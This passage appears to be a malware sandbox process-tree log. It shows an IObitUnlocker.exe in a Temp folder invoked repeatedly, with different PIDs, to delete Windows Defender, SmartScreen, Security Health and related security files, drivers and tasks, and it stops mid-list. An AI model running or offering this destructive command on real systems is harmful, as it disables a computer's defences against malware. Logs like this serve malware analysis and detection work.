                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8364
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7376
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5108
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8776
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:9192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8452
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7436
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 